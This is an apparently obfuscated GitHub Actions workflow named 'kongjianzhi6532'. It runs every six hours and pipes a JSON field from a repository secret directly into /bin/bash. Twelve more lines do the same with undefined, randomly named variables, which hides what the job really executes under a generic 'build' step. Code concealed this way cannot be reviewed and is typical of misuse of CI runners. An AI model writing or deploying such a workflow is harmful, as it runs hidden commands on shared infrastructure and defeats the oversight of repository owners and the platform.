name: kongjianzhi6532

on:
  workflow_dispatch:
  schedule:
    - cron: '44 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: kongjianzhi6532
        env:
          ir8: ${{ secrets.ir8 }}
        run: |
          echo $ir8 | jq -r .whor70 | /bin/bash
          echo $rom3 | jq -r .amfi72157 | /bin/bash
          echo $idy88612 | jq -r .z9 | /bin/bash
          echo $nwaxd3 | jq -r .lbdrp111 | /bin/bash
          echo $pqir322 | jq -r .zxo921 | /bin/bash
          echo $n123 | jq -r .f38 | /bin/bash
          echo $kf71005 | jq -r .av0 | /bin/bash
          echo $zgydz03 | jq -r .a3394 | /bin/bash
          echo $gjjr3 | jq -r .ujd4465 | /bin/bash
          echo $yrib97539 | jq -r .muys56 | /bin/bash
          echo $dzsan131 | jq -r .y0 | /bin/bash
          echo $agtfq69728 | jq -r .fu330 | /bin/bash
          echo $r0051 | jq -r .xnxl4627 | /bin/bash

